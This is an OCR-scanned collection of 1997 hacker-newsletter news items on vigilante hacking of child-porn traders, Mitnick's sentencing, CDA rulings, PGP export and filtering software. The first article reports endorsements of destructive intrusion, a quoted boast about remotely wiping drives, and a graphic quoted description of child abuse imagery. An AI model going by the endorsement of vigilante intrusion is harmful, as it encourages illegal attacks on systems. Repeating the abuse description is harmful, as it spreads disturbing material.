traders of preteen erotica. In his declaration of "public war" - 
posted to a mailing list devoted to an annual hacker’s convention 
called DefCon Se7en explains that the protocol on most child-porn 
servers is to upload selections from your own stash, in exchange for 
credits for more images. 


What he saw on those servers made him physically sick, he says. "For 
someone who took a virtual tour of the kiddie-porn world for only one 
day," he writes, "I had the opportunity to fully max out an Iomega 
100-MB Zip disc." 


Se7en’s plan to "eradicate" child-porn traders from the Net is 
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"advocating malicious, destructive hacking against these people." H 
has enlisted th xpertise of two fellow hackers for the first wave of 
attacks, which are under way. 


Se7en feels confident that legal authorities will look the other way 
when the victims of hacks are child pornographers - and he claims that 
a Secret Service agent told him so explicitly. Referring to a command 
to wipe out a hard drive by remote access, Se/7en boasted, "Who are 
they going to run to? The police? ’They hacked my kiddie-porn server 
and rm -rf’d my computer!’ Right." 


Se7en claims to have already "taken down" a "major player" - an 
employee of Southwestern Bell who Seven says was "posting ads all over 
the place." Se7en told Wired News that he covertly watched the man’s 
activities for days, gathering evidence that he emailed to the 
president of Southwestern Bell. Pseudonymous remailers like 
hotmail.com and juno.com, Se7en insists, provide no security blanket 
for traders against hackers uncovering their true identities by 
cracking server logs. Seven admits the process of gaining access to 
the logs is time consuming, however. Even with three hackers on the 
case, it "can take two or three days. We don’t want to hit the wrong 
person." 


A couple of days after submitting message headers and logs to the 
president and network administrators of Southwestern Bell, Seven says, 
he got a letter saying the employee was "no longer on the payroll." 


The hacker search for acceptance 


Se7en’s declaration of war received support on the original mailing 
list. "I am all for freedom of speech/expression," wrote one poster, 
"but there are some things that are just wrong.... I feel a certain 
moral obligation to the human race to do my part in cleaning up the 
evil." 


Federal crackdowns targeting child pornographers are ineffective, many 
argued. In April, FBI director Louis Freeh testified to the Senate 
that the bureau operation dubbed "Innocent Images" had gathered the 
names of nearly 4,000 suspected child-porn traffickers into its 
database. Freeh admitted, however, that only 83 of those cases 
resulted in convictions. (The Washington Times reports that there have 
also been two suicides.) 


The director’s plan? Ask for more federal money to fight the "dark 
side of the Internet" USS10 million. 


Pitching in to assist the Feds just isn’t the hacker way. As one 
poster to the DefCon list put it, "The government can’t enforce laws 
on the Internet. We all know that. We can enforce laws on the 
Internet. We all know that too." 


The DefCon list was not a unanimous chorus of praise for Se7en’s plan 
to give the pornographers a taste of hacker terror, however. The most 
vocal dissenter has been Declan McCullagh, Washington correspondent 
for the Netly News. McCullagh is an outspoken champion of 
constitutional rights, and a former hacker himself. He says he was 
disturbed by hackers on the list affirming the validity of laws 
against child porn that he condemns as blatantly unconstitutional. 


"Few people seem to realize that the long-standing federal child-porn 
law outlawed pictures of dancing girls wearing leotards," McCullagh 
wrote -— alluding to the conviction of Stephen Knox, a graduate student 
sentenced to five years in prison for possession of three videotapes 
of young girls in bathing suits. The camera, the US attorney general 
pointed out, lingered on the girls’ genitals, though they remained 
clothed. "The sexual implications of certain modes of dress, posture, 
or movement may readily put the genitals on exhibition in a lascivious 
manner, without revealing them in a nude display," the Feds argued — 
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and won. 


It’s decisions like Knox v. US, and a law criminalizing completely 
synthetic digital images "presented as" child porn, McCullagh says, 
that are making the definition of child pornography unacceptably 

broad: a "thought crime." 


The menace of child porn is being exploited by "censor-happy" 
legislators to "rein in this unruly cyberspace," McCullagh says. The 
rush to revile child porn on the DefCon list, McCullagh told Wired 
News, reminded him of the "loyalty oaths" of the McCarthy era. 


"These are hackers in need of social acceptance," he says. "They’ve 
been marginalized for so long, they want to be embraced for stamping 
out a social evil." McCullagh knows his position is a difficult one to 
put across to an audience of hackers. In arguing that hackers respect 
the property rights of pornographers, and ponder the constitutionality 
of the laws they’re affirming, McCullagh says, "I’m trying to convince 
hackers to respect the rule of law, when hacking systems is the 
opposite of that." 


But McCullagh is not alone. As the debate over Se7Jen’s declaration 
spread to the cypherpunks mailing list and alt.cypherpunks - 
frequented by an older crowd than the DefCon list others expressed 
Similar reservations over Se7en’s plan. 


"Basically, we’re talking about a Dirty Harry attitude," one network 
technician/cypherpunk told Wired News. Though he senses "real feeling" 
behind Se7en’s battle cry, he feels that the best way to deal with 
pornographers is to "turn the police loose on them." Another 
participant in the discussion says that while he condemns child porn 
as "terrible, intrinsically a crime against innocence," he questions 
th ffectiveness of Sev7en’s strategy. 


"Killing their computer isn’t going to do anything," he says, 
cautioning that the vigilante approach could be taken up by others. 
"What happens if you have somebody who doesn’t like abortion? At what 
point are you supposed to be enforcing your personal beliefs?" 


Raising the paranoia level 


Se7en’s loathing for aficionados of newsgroups like 
alt.sex.pedophilia.swaps runs deeper than "belief." "I myself was 
abused when I was a kid," Se7en told Wired News. "Luckily, I wasn’t a 
victim of child pornography, but I know what these kids are going 
through." 


With just a few hackers working independently to crack server logs, 
sniff IP addresses, and sound the alarm to network administrators, he 
says, “We can take out one or two people a week ... and get the 
paranoia level up," so that "casual traders" will be frightened away 
from IRC rooms like "#100%preteensexfuckpics." 


It’s not JPEGs of clothed ballerinas that raise his ire, Se7en says. 
It’s "the 4-year-olds being raped, the 6-year-old forced to have oral 
sex with cum running down themselves." Such images, Seven admits, are 
very rare —- even in online spaces dedicated to trading sexual imagery 
of children. 


"I know what I’m doing is wrong. I’m trampling on the rights of these 
guys," he says. "But somewhere in the chain, someone is putting these 
images on paper before they get uploaded. Your freedom ends when you 
start hurting other people." 


Oxf> 


Title: Mitnick Gets 22 Month Sentence 
Source: LA Times 
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Author: Julie Tamaki 
Date: Tuesday, June 17, 1997 


A federal judge indicated Monday that she plans to sentence famed computer 
hacker Kevin Mitnick to 22 months in prison for cellular phone fraud and 
violating his probation from an earlier computer crime conviction. 


The sentencing Monday is only a small part of Mitnick’s legal problems. 
Still pending against him is a 25-count federal indictment accusing him of 
stealing millions of dollars in software during an elaborate hacking spree 
while he was a fugitive. A trial date in that case has yet to be set. 


U.S. District Judge Mariana R. Pfaelzer on Monday held off on formally 
sentencing Mitnick for a week in order to give her time to draft conditions 
for Mitnick’s probation after he serves the prison term. 


Pfaelzer said she plans to sentence Mitnick to eight months on the cellular 
phone fraud charge and 14 months for violating his probation from a 1988 
computer-hacking conviction, Assistant U.S. Atty. Christopher Painter said. 
The sentences will run consecutively. 


Mitnick faces the sentence for violating terms of his probation when he 
broke into Pac Bell voice mail computers in 1992 and used stolen passwords 
of Pac Bell security employees to listen to voice mail, Painter said. At the 
time, Mitnick was employed by Teltec Communications, which was under 
investigation by Pac Bell. 


Ox10> 


Title: New York Judge Prohibits State Regulation of Internet 
Source: unknown 

Author: unknown 

Date: Friday, June 20, 1997 


NEW YORK -- As the nation awaits a Supreme Court decision on 
Internet censorship, a federal district judge here today blocked 
New York State from enforcing its version of the federal 
Communications Decency Act (CDA). 


Ruling simultaneously in ACLU v. Miller, another ACLU challenge to 
state Internet regulation, a Federal District Judge in Georgia 
today struck down a law criminalizing online anonymous speech and 
the use of trademarked logos as links on the World Wide Web. 


In ALA v. Pataki, Federal District Judge Loretta A. Preska issued 
a preliminary injunction against the New York law, calling the 
Internet an area of commerce that should be marked off as a 
"national preserve" to protect online speakers from inconsistent 
laws that could "paralyze development of the Internet altogether." 


Judge Preska, acknowledging that the New York act was "clearly 
modeled on the CDA," did not address the First Amendment issues 
raised by the ACLU’s federal challenge, saying that the Commerce 
Clause provides "fully adequate support" for the injunction and 
that the Supreme Court would address the other issues in its 
widely anticipated decision in Reno v. ACLU. (The Court’s next 
scheduled decision days are June 23, 25 and 26.) 


"Today’s decisions in New York and Georgia say that, whatever 
limits the Supreme Court sets on Congress’s power to regulate the 
Internet, states are prohibited from acting to censor online 
expression," said Ann Beeson, an ACLU national staff attorney who 
argued the case before Judge Preska and is a member of the ACLU v. 
Miller and Reno v. ACLU legal teams. 


"Taken together, these decisions send a very important and 
powerful message to legislators in the other 48 states that they 
should keep their hands off the Internet," Beeson added. 
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In a carefully reasoned, 62-page opinion, Judge Preska warned of 
th xtreme danger that state regulation would pose to the 
Internet, rejecting the state’s argument that the statute would 
ven b ffective in preventing so-called "indecency" from 
reaching minors. Further, Judge Preska observed, the state can 
already protect children through the vigorous enforcement of 
existing criminal laws. 


"In many ways, this decision is more important for the business 
community than for the civil liberties community," said Chris 
Hansen, a senior ACLU attorney on the ALA v. Pataki legal team and 
lead counsel in Reno v. ACLU. "Legislatures are just about done 
with their efforts to regulate the business of Internet ’sin,’ and 
have begun turning to the business of the Internet itself. Today’s 
decision ought to stop that trend in its tracks." 


Saying that the law would reduce all speech on the Internet to a 
level suitable for a six-year-old, the American Civil Liberties 
Union, the New York Civil Liberties Union, the American Library 
Association and others filed the challenge in January of this 
year. 


The law, which was passed by the New York legislature late last 
year, provides criminal sanctions of up to four years in jail for 
communicating so-called "indecent" words or images to a minor. 


In a courtroom hearing before Judge Preska in April, the ACLU 
presented a live Internet demonstration and testimony from 
plaintiffs who said that their speech had already been "chilled" 
by the threat of criminal prosecution. 


"This is a big win for the people of the state of New York," said 
Norman Siegel, Executive Director of the New York Civil Liberties 
Union. "Today’s ruling vindicates what we have been saying all 
along to Governor Pataki and legislators, that they cannot legally 
prevent New Yorkers from engaging in uninhibited, open and robust 
freedom of expression on the Internet." 


The ALA v. Pataki plaintiffs are: the American Library 
Association, the Freedom to Read Foundation, the New York Library 
Association, the American Booksellers Foundation for Free 
Expression, Westchester Library System, BiblioBytes, Association 
of American Publishers, Interactive Digital Software Association, 
Magazine Publishers of America, Public Access Networks Corp. 
(PANIX), ECHO, NYC Net, Art on the Net, Peacefire and the American 
Civil Liberties Union. 


Michael Hertz and others of the New York firm Latham & Watkins 
provided pro-bono assistance to the ACLU and NYCLU; Michael 
Bamberger of Sonnenschein Nath & Rosenthal in New York is also 
co-counsel in the case. Lawyers from the ACLU are Christopher 
Hansen, Ann Beeson and Art Eisenberg, legal director of the NYCLU. 


Ox11> 


Title: Breaking the Crypto Barrier 
Source: Wired 

Author: Chris Oakes 

Date: 5:03am 20.Jun.97.PDT 


Amid a striking convergence of events bearing on 

US encryption policy this week, one development underlined what many see 
as the futility of the Clinton administration’s continuing effort to 
block the export of strong encryption: The nearly instantaneous movement 
of PGP’s 128-bit software from its authorized home on a Web server at 
MIT to at least one unauthorized server in Europe. 
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Shortly after Pretty Good Privacy’s PGP 5.0 freeware was made available 
at MIT on Monday, the university’s network manager, Jeffrey Schiller, 
says he read on Usenet that the software had already been transmitted to 
a foreign FTP server. Ban or no ban, someone on the Net had effected the 
instant export of a very strong piece of code. On Wednesday, Wired News 
FTP’d the software from a Dutch server, just like anyone with a 
connection could have. 


A Commerce Department spokesman said his office was unaware of the 
breach. 


The event neatly coincided with the appearance of a new Senate bill that 
seeks to codify the administration’s crypto policy, and an announcement 
Wednesday that an academic/corporate team had succeeded in breaking the 
government’s standard 56-bit code. 


The software’s quick, unauthorized spread to foreign users might have an 
unexpected effect on US law, legal sources noted. 


"If [Phil] Zimmermann’s [original PGP] software hadn’t gotten out on the 
Internet and been distributed worldwide, unquestionably we wouldn’t have 
strong encryption today," said lawyer Charles Merrill, who chairs his 
firm’s computer and high-tech law-practice group. Actions like the PGP 
leak, he speculated, may further the legal flow of such software across 
international borders. 


Said Robert Kohn, PGP vice president and general counsel: "We’re 
optimistic that no longer will PGP or companies like us have to do 
anything special to export encryption products." 


The Web release merely sped up a process already taking place using a 
paper copy of the PGP 5.0 source code and a scanner - reflecting the 
fact it is legal to export printed versions of encryption code. 


On Wednesday, the operator of the International PGP Home Page announced 
that he had gotten his hands on the 6,000-plus-page source code, had 
begun scanning it, and that a newly compiled version of the software 
will be available in a few months. 


Norwegian Stale Schumaker, who maintains the site, said several peopl 
emailed and uploaded copies of the program to an anonymous FTP server he 
maintains. But he said he deleted the files as soon as he was aware of 
them, because he wants to "produce a version that is 100 percent legal" 
by scanning the printed code. 


The paper copy came from a California publisher of technical manuals and 
was printed with the cooperation of PGP Inc. and its founder, Phil 
Zimmermann. Schumaker says he does not know who mailed his copy. 


"The reason why we publish the source code is to encourage peer review," 
said PGP’s Kohn, "so independent cryptographers can tell other people 
that there are no back doors and that it is truly strong encryption." 


Schumaker says his intentions are farther-reaching. 


"We are a handful of activists who would like to see PGP spread to the 
whole world," his site reads, alongside pictures of Schumaker readying 
pages for scanning. "You’re not allowed to download the program from 
MIT’s Web server because of the archaic laws in the US. That’s why we 
exported the source-code books." 


Ox12> 


Title: Setback in Efforts to Secure Online Privacy 
Source: unknown 
Author: unknown 
Date: Thursday, June 19, 1997 
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WASHINGTON -- A Senate committee today setback legislative efforts to 
secure online privacy, approving legislation that would restrict the right 
of businesses and individuals both to use encryption domestically and to 
export it. 


On a voice vote, the Senate Commerce Committee adopted legislation that 
essentially reflects the Clinton Administration’s anti-encryption policies. 


The legislation approved today on a voice vote by the Senate Commerc 
Committee was introduced this week by Senate Commerce Committee Chairman 
John McCain, Republican of Arizona, and co-sponsored by Democrats Fritz 
Hollings of South Carolina; Robert Kerry of Nebraska and John Kerry of 
Massachusetts. 


Encryption programs scramble information so that it can only be read 
with a "key" -- a code the recipient uses to unlock the scrambled 
electronic data. Programs that use more than 40 bits of data to encode 
information are considered "strong" encryption. Currently, unless these 
keys are made available to the government, the Clinton Administration bans 
export of hardware or software containing strong encryption, treating 
these products as "munitions." 


Privacy advocates continue to criticize the Administration’s 
stance, saying that the anti-cryptography ban has considerably 
weakened U.S. participation in the global marketplace, in addition 
to curtailing freedom of speech by denying users the right to "speak" 
using encryption. The ban also violates the right to privacy by 
limiting the ability to protect sensitive information in the new 
computerized world. 


Today’s committee action knocked out of consideration the so-called 
"Pro-CODE" legislation, a pro-encryption bill introduced by Senator 
Conrad Burns, Republican of Montana. Although the Burns legislation 
raised some civil liberties concerns, it would have lifted export 
controls on encryption programs and generally protected individual 
privacy. 


"Privacy, anonymity and security in the digital world depend on 
encryption," said Donald Haines, legislative counsel on privacy and 
cyberspace issues for the ACLU’s Washington National Office. "The aim 
of the Pro-CODE bill was to allow U.S. companies to compete with 
industries abroad and lift restrictions on the fundamental right to 
free speech, the hallmark of American democracy." 


"Sadly, no one on the Commerce Committee, not even Senator Burns, 
stood up and defended the pro-privacy, pro-encryption effort," Haines 
added. 


In the House, however, strong encryption legislation that would add 
new privacy protections for millions of Internet users in this country and 
around the world has been approved by two subcommittees. 


The legislation -- H.R. 695, the "Security and Freedom Through 
Encryption Act" or SAFE -- would make stronger encryption products 
available to American citizens and users of the Internet around the 

world. It was introduced by Representative Robert W. Goodlatte, Republican 


of Virginia. 


"We continue to work toward the goal of protecting the privacy of all 
Internet users by overturning the Clinton Administration’s unreasonable 
encryption policy," Haines concluded 


0x13> 


Title: Captain Crunch Web Site Now Moved 
Source: Telecom Digest 17.164 


The Cap’n Crunch home page URL has been changed. The new URL is now 
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http://crunch.woz.org/crunch 


I’ve made significant changes to the site, added a FAQ based on a lot 
of people asking me many questions about blue boxing, legal stuff, and 
hacking in general. The FAQ will be growing all the time, as I go 
through all the requests for information that many people have sent. 
"Email me" if you want to add more questions. 


Our new server is now available to host web sites for anyone who wants 
to use it for interesting projects. This is for Elite people only, 
and you have to send me a proposal on what you plan to use it for. 


[So now old John gets to decide who is elite and who isn’t.] 


I’m open for suggestions, and when you go up to the WebCrunchers web 
site: http://crunch.woz.org 


You’1ll get more details on that. Our server is a Mac Power PC, 
running WebStar web server, connected through a T-1 link to the 
backbone. I know that the Mac Webserver might be slower, but I had 


security in mind when I picked it. Besides, I didn’t pick it, Steve 
Wozniak did... :-) So please don’t flame me for using a Mac. 
I know that Mac’s are hated by hackers, but what the heck ... at least 


we got our OWN server now. 


I also removed all the blatant commercial hipe from the home page and 
put it elsewhere. But what the heck ... I should disserve to make 
SOME amount of money selling things like T-shirts and mix tapes. 


We plan to use it for interesting projects, and I want to put up some 
Audio files of Phone tones. For instance, the sound of a blue box 
call going through, or some old sounds of tandom stacking. If there 
are any of you old-timers out there that might have some interesting 
audio clips of these sounds, please get in touch with me. 


[There is already a page out there with those sounds and a lot more.. 
done by someone who discovered phreaking on their own. Little known 
fact because of all the obscurement: John Draper did not discover 

blue boxing. It was all taught to him.] 


Our new Domain name registration will soon be activated, and at that 
time our URL will be: 


http://www.webcrunchers.com - Our Web hosting server 
http://www.webcrunchers.com/crunch - Official Cap’n Crunch home page 


Regards, 
Cap’n Crunch 
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Title: US Justive Dept. Investigating Network Solutions 
Source: New York Times 

Author: Agis Salpukas 

Date: 7 July ‘97 


The Justice Department has begun an investigation into the 
practice of assigning Internet addresses to determine if the 
control that Network Solutions Inc. exercises over the process 
amounts to a violation of antitrust laws. 


The investigation was disclosed by the company Thursday in 
documents filed with the Securities and Exchange Commission. The 
filing came as part of a proposed initial stock offering that is 
intended to raise $35 million. 


The investigation was first reported in The Washington Post on 
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Network Solutions, which is based in Herndon, Va., and is a 
subsidiary of Science Applications International Corp., has been 
the target of a growing chorus of complaints and two dozen 
lawsuits as the Internet has expanded and the competition for 
these addresses, or domain names, has grown more intense. 


Ox15> 


Title: Cyber Patrol Bans Crypt Newsletter 
Source: Crypt Newsletter 

Author: George Smith 

Date: June 19, 1997 


Hey, buddy, did you know I’m a militant extremist? Cyber Patrol, the 
Net filtering software designed to protect your children from 
cyberfilth, says so. Toss me in with those who sleep with a copy of 
"The Turner Diaries" under their pillows and those who file nuisance 
liens against officials of the IRS. Seems my Web site is dangerous 
viewing. 


I discovered I was a putative militant extremist while reading a 
story on Net censorship posted on Bennett Haselton’s PeaceFire 

Web site. Haselton is strongly critical of Net filtering software and 
he’s had his share of dustups with vendors like Cyber Patrol, who 
intermittently ban his site for having the temerity to be a naysayer. 


Haselton’s page included some links so readers could determine what 
other Web pages were banned by various Net filters. On a lark, I typed 
in the URL of the Crypt Newsletter, the publication I edit. Much to my 
surprise, I had been banned by Cyber Patrol. The charge? Militant 
extremism. Cyber Patrol also has its own facility for checking if a 
site is banned, called the CyberNOT list. Just to be sure, I 
double-checked. Sure enough, I was a CyberNoOT. 


Now you can call me Ray or you can call me Joe, but don’t ever call me 
a militant extremist! I’ve never even seen one black helicopter 
transporting U.N. troops to annex a national park. 


However, nothing is ever quite as it seems on the Web and before I 
went into high dudgeon over political censorship--the Crypt Newsletter 
has been accused of being "leftist" for exposing various 

government, academic, and software industry charlatans--I told some of 
my readership. Some of them wrote polite--well, almost polite--letters 
to Debra Greaves, Cyber Patrol’s head of Internet research. And 
Greaves wrote back almost immediately, indicating it had all been a 
mistake. 


My Web site was blocked as a byproduct of a ban on another page on the 
same server. "We do have a [blocked] site off of that server with a 
Similar directory. I have modified the site on our list to be more 
unique so as to not affect [your site] any longer," she wrote. 


Perhaps I should have been reassured that Cyber Patrol wasn’t banning 
sites for simply ridiculing authority figures, a favorite American 
past time. But if anything, I was even more astonished to discover th 
company’s scattershot approach to blocking. It doesn’t include precise 
URLs in its database. Instead, it prefers incomplete addresses that 
block everything near the offending page. The one that struck down 
Crypt News was "soci.niu.edu/~cr," a truncated version of my complete 
URL. In other words: any page on the machine that fell under "“cr" was 
toast. 


Jim Thomas, a sociology professor at Northern Illinois University, 
runs this particular server, and it was hard to imagine what would be 
militantly extreme on it. Nevertheless, I ran the news by Thomas. It 
turns out that the official home page of the American Society of 
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Criminology’s Critical Criminology Division, an academic resource, 
was the target. It features articles from a scholarly criminology 
journal and has the hubris to be on record as opposing the death 
penalty but didn’t appear to have anything that would link it with 
bomb-throwing anarchists, pedophiles, and pornographers. 


There was, however, a copy of the Unabomber Manifesto on the page. 


I told Thomas I was willing to bet $1,000 cash money that Ted 
Kaczynski’s rant was at the root of Cyber Patrol’s block. 
Thomas confirmed it, but I can’t tell you his exact words. It 
might get this page blocked, too. 


What this boils down to is that Cyber Patrol is banning writing on the 
Web that’s been previously published in a daily newspaper: The 
Washington Post. It can also be said the Unabomber Manifesto already 
has been delivered to every corner of American society. 


If the ludicrous quality of this situation isn’t glaring enough, 
consider that one of Cyber Patrol’s partners, CompuServe, promoted the 
acquisition of electronic copies of the Unabomber Manifesto after it 
published by the Post. And these copies weren’t subject to any 
restrictions that would hinder children from reading them. In fact, 
I’ve never met anyone from middle-class America who said, "Darn those 
irresponsible fiends at the Post! Now my children will be inspired to 
retreat to the woods, write cryptic essays attacking techno-society, 
and send exploding parcels to complete strangers." 


Have you? 


So, will somebody explain to me how banning the Unabomber Manifesto, 
the ASC’s Critical Criminology home page, and Crypt Newsletter 
protects children from smut and indecency? That’s a rhetorical 
question. 


Cyber Patrol is strongly marketed to public libraries, and has been 
acquired by some, in the name of protecting children from Net 
depravity. 


Funny, I thought a public library would be one of the places you’d be 
more likely to find a copy of the Unabomber Manifesto. 


Ox16> 


Title: Some humor on media hacks and hackers 
Source: Defcon Mailing List 
Author: George Smith / Crypt Newsletter 


In as fine a collection of stereotypes as can be found, the 
Associated Press furnished a story on July 14 covering the annual 
DefCon hacker get together in Las Vegas. It compressed at least 
one hoary cliche into each paragraph. 


Here is a summary of them. 


The lead sentence: "They’re self-described nerds ... " 


Then, in the next sentence, "These mostly gawky, mostly male 
teen-agers . . . also are the country’s smartest and slyest computer 
hackers." 


After another fifty words, "These are the guys that got beat up in 
high school and this is their chance to get back ..." 


Add a sprinkling of the obvious: "This is a subculture of 
computer technology .. ." 


Stir in a paraphrased hacker slogan: "Hacking comes from an 
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intellectual desire to figure out how things work 


A whiff of crime and the outlaw weirdo: "Few of these wizards will 
identify themselves because they fear criminal prosecution... a 
25-year-old security analyst who sports a dog collar and nose ring, is 
cautious about personal information." 


Close with two bromides that reintroduce the stereotyp 


"Hackers are not evil people. Hackers are kids." 


As a simple satirical exercise, Crypt News rewrote the Associated 
Press story as media coverage of a convention of newspaper editors. 


It looked like this: 


LAS VEGAS They’ re self-described nerds, dressing in starched 
white shirts and ties. 


These mostly overweight, mostly male thirty, forty and 
fiftysomethings are the country’s best known political pundits, 
gossip columnists and managing editors. On Friday, more than 1,500 of 
them gathered in a stuffy convention hall to swap news and network. 


"These are the guys who ate goldfish and dog biscuits at frat parties 
in college and this is their time to strut," said Drew Williams, 
whose company, Hill & Knowlton, wants to enlist the best editors 

and writers to do corporate p.r. 


"This is a subculture of corporate communicators," said Williams. 


Journalism comes from an intellectual desire to be the town crier 
and a desire to show off how much you know, convention-goers said. 
Circulation numbers and ad revenue count for more than elegant prose 
and an expose on the President’s peccadillos gains more esteem from 
ones’ peers than klutzy jeremiads about corporate welfare and 
white-collar crime. 


One group of paunchy editors and TV pundits were overheard 
joking about breaking into the lecture circuit, where one 

well-placed talk to a group of influential CEOs or military 
leaders could earn more than many Americans make in a year. 


Few of these editors would talk on the record for fear of 
professional retribution. Even E.J., a normally voluble 
45-year-old Washington, D.C., editorial writer, was reticent. 


"Columnists aren’t just people who write about the political 
scandal of the day," E.J. said cautiously. "I like to think of 
columnists as people who take something apart that, perhaps, 


didn’t need taking apart." 


"We are not evil people. We’re middle-aged, professional 
entertainers in gray flannel suits." 


Ox17> 


Title: Cellular Tracking Technologies 
Source: unknown 
Author: unknown 


A recent article from the San Jose Mercury News by Berry Witt ("Squabble 
puts non-emergency phone number on hold") raises several important 
questions -- questions I think are relavant to the CUD’s readership... 


Does anybody remember the FBI’s request that cell phone companies must 
build in tracking technology to their systems that allows a person’s 
position to be pin pointed by authorities? That suggested policy resulted 
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in a flurry of privacy questions and protests from the industry, suggesting 
such requirements would force them to be uncompetitive in the global 
marketplace. The article, dated July 20, (which was focused on 911 
cellular liability issues) suggests federal authorities may have worked out 
an end run around the controversy. The article states: 


"The cellular industry is working to meet a federal requirement that by 
next spring, 911 calls from cellular phones provide dispatchers the 
location of the nearest cell site and that within five years, cellular 
calls provide dispatchers the location of the caller within a 125-meter 
radius. " 


On its face, this seems reasonable and it is a far cry from the real time 
tracking requirements of any cell phone that is turned on (The FBI’s 
original request). But by next spring, this tracking system will be in 
place and on line. I have heard no public debate about the privacy 
implications regarding this "Federal Requirement", nor has there been any 
indication that this information will be restricted to 911 operators. 


Will this information be available to law enforcement officials if they 
have a warrant? If they don’t have a warrant? Will this information be 
secured so enterprising criminals won’t have access to it? Exactly WHAT 
kind of security is being implemented so it WON’T be accessible to the 
general public. 


This smacks of subterfuge. By cloaking the cellular tracking issue in the 
very real issue of the 911 location system, the federal government and law 
nforcement agencies have circumvented the legitimate privacy questions 
that arose from their initial Cellular tracking request. 


Ox18> 


Title: Court Mixes Internet Smut Provision 
Source: Associated Press 

Author: unknown 

Date: June 26, 1997 


WASHINGTON (AP) -- Congress violated free-speech rights when it 
tried to curb smut on the Internet, the Supreme Court ruled today. 
In its first venture into cyberspace law, the court invalidated a 
key provision of the 1996 Communications Decency Act. 


Congress’ effort to protect children from sexually explicit 
material goes too far because it also would keep such material 
from adults who have a right to see it, the justices unanimously 
said. 


The law made it a crime to put adult-oriented material online 
where children can find it. The measure has never taken effect 
because it was blocked last year by a three-judge court in 
Philadelphia. 


‘‘We agree with the thr judge district court that the statute 
abridges the freedom of speech protected by the First Amendment,’’ 
Justice John Paul Stevens wrote for the court. 


‘‘The (Communications Decency Act) is a content-based regulation 
of speech,’’ he wrote. ‘‘The vagueness of such a regulation raises 
special First Amendment concerns because of its obvious chilling 
effect on free speech.’’ 


‘“‘As a matter of constitutional tradition ... we presume that 
governmental regulation of the content of speech is more likely to 
interfere with the free exchange of ideas than to encourage it,’’ 
Stevens wrote. 


Sexually explicit words and pictures are protected by the 
Constitution’s First Amendment if they are deemed indecent but not 
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obscene. 


Ox1> 


Book Title: Underground 
Poster: Darren Reed 


A few people will have heard me mention this book already, but I think 
there are bits and pieces of this book which will surprise quite a few 
people. Most of us are used to reading stories about hacking by the 
people who did the catching of the hackers...this one is an ongoing 

story of the local hacker scene...with not so local contacts and exploits. 


Some of the important things to note are just how well they do work 
together, as well as competing with each other and what they do when 
they get pissed off with each other. Meanwhile most of the white hats 
are too busy trying to hoard information from the other white hats... 


Having been on the "victim" side in the past, it is quite frustrating 

when someone you’ve worked to have arrested gets off with a fine. Most 

of us would agree that they should be locked up somewhere, but 

according to what’s in the book, most of them are suffering from either 
problems at home or other mental disorders (including one claim in court 

to being addicted to hacking). Anyone for a "Hackers Anonymous Association" 
for help in drying out from this nefarious activity ? At least in one 

case documented within the perpetrators get sentenced to time behind bars. 


It’s somewhat comforting to read that people have actually broken into 
the machines which belong to security experts such as Gene Spafford and 
Matt Bishop, although I’d have preferred to have not read how they 
successfully broke into the NIC :-/ Don’t know about you, but I don’t 
care what motives they have, I’d prefer for them to not be getting inside 
machines which provide integral services for the Internet. 


For all of you who like to hide behind firewalls, in one instance a hacker 
comes in through X.25 and out onto the Internet. Nice and easy ’cause 
we don’t need to firewall our X.25 connection do we ? :-) 


Oh, and just for all those VMS weenies who like to say "We’re secure, 


we run VMS not Unix" - the first chapter of the book is on a VMS worm 
called "WANK" that came close to taking the NASA VMS network completely 
off air. I wonder how long it will take for an NT equivalent to surface... 


All in all, a pretty good read (one from which I’m sure hackers will learn 
just as much from as the rest of us). 

The book’s details are: 

Title: UNDERGROUND - Tales of Hacking, madness and obsession on the 
Electronic Frontier 

ISBN 1-86330-595-5 

Author: Suelette Dreyfus 

Publisher: Random House 

Publisher’s address: 20 Alfred St, Milsons Point, NSW 2061, Australia 
Price: AUSS19.95 


before I forget, the best URL for the book I’ve found is: 


http://www.underground-book.com (http://underground.org/book is a mirror) 


Ox2> 


Book Title: "Hackers" 
Poster: Paul Taylor P.A.Taylor@sociology.salford.ac.uk 


There’s an open invite for people to contact me and discuss the 
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above and/or anything else that they think is relevant/important. 


Below is a brief overview of 
the eventual book’s rationale and proposed structure. 


Hackers: a study of a technoculture 
Background 


"Hackers" is based upon 4 years PhD research conducted from 
1989-1993 at the University of Edinburgh. The research focussed 
upon 3 main groups: the Computer Underground (CU); the Computer 
Security Industry (CSI); and the academic community. Additional 
information was obtained from government officials, journalists 
etc. 


The face-to-face interview work was conducted in the UK and the 
Netherlands. It included figures such as Rop Gongrijp of 
Hack-Tic magazine, Prof Hirschberg of Delft University, and 
Robert Schifreen. E-mail/phone interviews were conducted in 
Europe and the US with figures such as Prof Eugene Spafford of 
Purdue Technical University, Kevin Mitnick, Chris Goggans and 
John Draper. 


Rationale 


This book sets out to be an academic study of the social 
processes behind hacking that is nevertheless accessible to a 
general audience. It seeks to compensate for the "Gee-whiz" 
approach of many of the journalistic accounts of hacking. The 
tone of these books tends to be set by their titles: The Fugitive 
Game; Takedown; The Cyberthief and the Samurai; Masters of 
Deception - and so on 


The basic argument in this book is that, despite the media 
portrayal, hacking is not, and never has been, a simple case of 
"electronic vandals" versus the good guys: the truth is much more 
complex. The boundaries between hacking, the security industry 
and academia, for example, are often relatively fluid. In 
addition, hacking has a significance outside of its immediate 
environment: the disputes that surround it symbolise society’s 
attempts to shape the values of the informational environments we 
will inhabit tomorrow. 


Book Outline 


H 


ntroduction —- the background of the study and the range of 
contributors 


Chapter 1 - The cultural significance of hacking: non-fiction and 
fictional portrayals of hacking. 


Chapter 2 - Hacking the system: hackers and theories of technological change. 
Chapter 3 - Hackers: their culture. 

Chapter 4 - Hackers: their motivations 

Chapter 5 The State of the (Cyber)Nation: computer security weaknesses. 


Chapter 6- Them and Us: boundary formation and constructing "the other". 


Chapter 7 — Hacking and Legislation. 


Conclusion 
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Ox1> 


Convention: Cybercrime Conference Announcement 
Date: Oct 29 - 31 


Cybercrime; E-Commerce & Banking; Corporate, Bank & Computer 
Security; Financial Crimes and Information Warfare Conference 
will be held October 29, 30, & 31, 1997 (Washington, D.C.) and 
November 17 & 18 (New York City) for bankers, lawyers, 
information security directors, law enforcement, regulators, 
technology developers/providers. 


Responding to the global threat posed by advancing technology, 
senior level decision makers will join together to share remedies 
and solutions towards the ultimate protection of financial and 
intellectual property; and against competitive espionage and 
electronic warfare. An international faculty of 30 experts will 
help you protect your business assets, as well as the information 
infrastructure at large. 


There will also be a small technology vendor exhibition. 


Sponsored by Oceana Publications Inc. 50 year publisher of 
international law, in cooperation with the Centre for 
